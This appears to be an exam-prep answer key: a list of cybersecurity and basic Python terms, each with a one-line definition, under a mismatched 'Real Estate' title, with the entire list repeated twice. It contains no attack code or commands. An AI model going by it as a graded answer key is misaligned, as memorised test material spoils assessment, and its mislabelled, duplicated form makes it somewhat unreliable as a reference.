GOOGLE CYBERSECURITY REAL
ESTATE EXAM QUESTIONS AND
ANSWERS
Stored XSS attack - Answer-An instance when a malicious script is injected directly on
the server
Symmetric encryption - Answer-The use of a single secret key to exchange information
Tailgating - Answer-A social engineering tactic in which unauthorized people follow an
authorized person into a restricted area
Trojan horse - Answer-Malware that looks like a legitimate file or program
User provisioning - Answer-The process of creating and maintaining a user's digital
identity
Whaling - Answer-A category of spear phishing attempts that are aimed at high-ranking
executives in an organization
Web-based exploits - Answer-Malicious code or behavior that's used to take advantage
of coding flaws in a web application
Worm - Answer-Malware that can duplicate and spread itself across systems on its own
Zero-day - Answer-An exploit that was previously unknown
Anomaly-based analysis - Answer-A detection method that identifies abnormal behavior
Command and control (C2) - Answer-The techniques used by malicious actors to
maintain communications with compromised systems
Common Event Format (CEF) - Answer-A log format that uses key-value pairs to
structure data and identify fields and their corresponding values
Computer security incident response teams (CSIRT) - Answer-A specialized group of
security professionals that are trained in incident management and response
Crowdsourcing - Answer-The practice of gathering information using public
collaboration
,Data exfiltration - Answer-Unauthorized transmission of data from a system
Endpoint detection and response (EDR) - Answer-An application that monitors an
endpoint for malicious activity
Honeypot - Answer-A system or resource created as a decoy vulnerable to attacks with
the purpose of attracting potential intruders
Host-based intrusion detection system (HIDS) - Answer-An application that monitors the
activity of the host on which it's installed
Indicators of attack (IoA) - Answer-The series of observed events that indicate a real-
time incident
Indicators of compromise (IoC) - Answer-Observable evidence that suggests signs of a
potential security incident
Key-value pair - Answer-A set of data that represents two linked items: a key, and its
corresponding value
Media Access Control (MAC) Address - Answer-A unique alphanumeric identifier that is
assigned to each physical device on a network
Network-based intrusion detection system (NIDS) - Answer-An application that collects
and monitors network traffic and network data
Network Interface Card (NIC) - Answer-Hardware that connects computers to a network
Open-source intelligence (OSINT) - Answer-The collection and analysis of information
from publicly available sources to generate usable intelligence
Packet capture (p-cap) - Answer-A file containing data packets intercepted from an
interface or network
Post-incident activity - Answer-The process of reviewing an incident to identify areas for
improvement during incident handling
Search Processing Language (SPL) - Answer-Splunk's query language
Security operations center (SOC) - Answer-An organizational unit dedicated to
monitoring networks, systems, and devices for security threats or attacks
Security orchestration, automation, and response (SOAR) - Answer-A collection of
applications, tools, and workflows that uses automation to respond to security events
, Sudo - Answer-A command that temporarily grants elevated permissions to specific
users
Suricata - Answer-An open-source intrusion detection system and intrusion prevention
system
tcpdump - Answer-A command-line network protocol analyzer
Telemetry - Answer-The collection and transmission of data for analysis
VirusTotal - Answer-A service that allows anyone to analyze suspicious files, domains,
URLs, and IP addresses for malicious content
Wireshark - Answer-An open-source network protocol analyzer
YARA-L - Answer-A computer language used to create rules for searching through
ingested log data
Argument (Python) - Answer-The data brought into a function when it is called
Built-in function - Answer-A function that exists within Python and can be called directly
Command-line interface - Answer-A text-based user interface that uses commands to
interact with the computer
Debugger - Answer-A software tool that helps to locate the source of an error and
assess its causes
Debugging - Answer-The practice of identifying and fixing errors in code
Immutable - Answer-An object that cannot be changed after it is created and assigned a
value
Integrated development environment (IDE) - Answer-A software application for writing
code that provides editing assistance and error correction tools
Iterative statement - Answer-Code that repeatedly executes a set of instructions
Interpreter - Answer-A computer program that translates Python code into runnable
instructions line by line
List concatenation - Answer-The concept of combining two lists into one by placing the
elements of the second list directly after the elements of the first list
Loop variable - Answer-A variable that is used to control the iterations of a loop
ESTATE EXAM QUESTIONS AND
ANSWERS
Stored XSS attack - Answer-An instance when a malicious script is injected directly on
the server
Symmetric encryption - Answer-The use of a single secret key to exchange information
Tailgating - Answer-A social engineering tactic in which unauthorized people follow an
authorized person into a restricted area
Trojan horse - Answer-Malware that looks like a legitimate file or program
User provisioning - Answer-The process of creating and maintaining a user's digital
identity
Whaling - Answer-A category of spear phishing attempts that are aimed at high-ranking
executives in an organization
Web-based exploits - Answer-Malicious code or behavior that's used to take advantage
of coding flaws in a web application
Worm - Answer-Malware that can duplicate and spread itself across systems on its own
Zero-day - Answer-An exploit that was previously unknown
Anomaly-based analysis - Answer-A detection method that identifies abnormal behavior
Command and control (C2) - Answer-The techniques used by malicious actors to
maintain communications with compromised systems
Common Event Format (CEF) - Answer-A log format that uses key-value pairs to
structure data and identify fields and their corresponding values
Computer security incident response teams (CSIRT) - Answer-A specialized group of
security professionals that are trained in incident management and response
Crowdsourcing - Answer-The practice of gathering information using public
collaboration
,Data exfiltration - Answer-Unauthorized transmission of data from a system
Endpoint detection and response (EDR) - Answer-An application that monitors an
endpoint for malicious activity
Honeypot - Answer-A system or resource created as a decoy vulnerable to attacks with
the purpose of attracting potential intruders
Host-based intrusion detection system (HIDS) - Answer-An application that monitors the
activity of the host on which it's installed
Indicators of attack (IoA) - Answer-The series of observed events that indicate a real-
time incident
Indicators of compromise (IoC) - Answer-Observable evidence that suggests signs of a
potential security incident
Key-value pair - Answer-A set of data that represents two linked items: a key, and its
corresponding value
Media Access Control (MAC) Address - Answer-A unique alphanumeric identifier that is
assigned to each physical device on a network
Network-based intrusion detection system (NIDS) - Answer-An application that collects
and monitors network traffic and network data
Network Interface Card (NIC) - Answer-Hardware that connects computers to a network
Open-source intelligence (OSINT) - Answer-The collection and analysis of information
from publicly available sources to generate usable intelligence
Packet capture (p-cap) - Answer-A file containing data packets intercepted from an
interface or network
Post-incident activity - Answer-The process of reviewing an incident to identify areas for
improvement during incident handling
Search Processing Language (SPL) - Answer-Splunk's query language
Security operations center (SOC) - Answer-An organizational unit dedicated to
monitoring networks, systems, and devices for security threats or attacks
Security orchestration, automation, and response (SOAR) - Answer-A collection of
applications, tools, and workflows that uses automation to respond to security events
, Sudo - Answer-A command that temporarily grants elevated permissions to specific
users
Suricata - Answer-An open-source intrusion detection system and intrusion prevention
system
tcpdump - Answer-A command-line network protocol analyzer
Telemetry - Answer-The collection and transmission of data for analysis
VirusTotal - Answer-A service that allows anyone to analyze suspicious files, domains,
URLs, and IP addresses for malicious content
Wireshark - Answer-An open-source network protocol analyzer
YARA-L - Answer-A computer language used to create rules for searching through
ingested log data
Argument (Python) - Answer-The data brought into a function when it is called
Built-in function - Answer-A function that exists within Python and can be called directly
Command-line interface - Answer-A text-based user interface that uses commands to
interact with the computer
Debugger - Answer-A software tool that helps to locate the source of an error and
assess its causes
Debugging - Answer-The practice of identifying and fixing errors in code
Immutable - Answer-An object that cannot be changed after it is created and assigned a
value
Integrated development environment (IDE) - Answer-A software application for writing
code that provides editing assistance and error correction tools
Iterative statement - Answer-Code that repeatedly executes a set of instructions
Interpreter - Answer-A computer program that translates Python code into runnable
instructions line by line
List concatenation - Answer-The concept of combining two lists into one by placing the
elements of the second list directly after the elements of the first list
Loop variable - Answer-A variable that is used to control the iterations of a loop
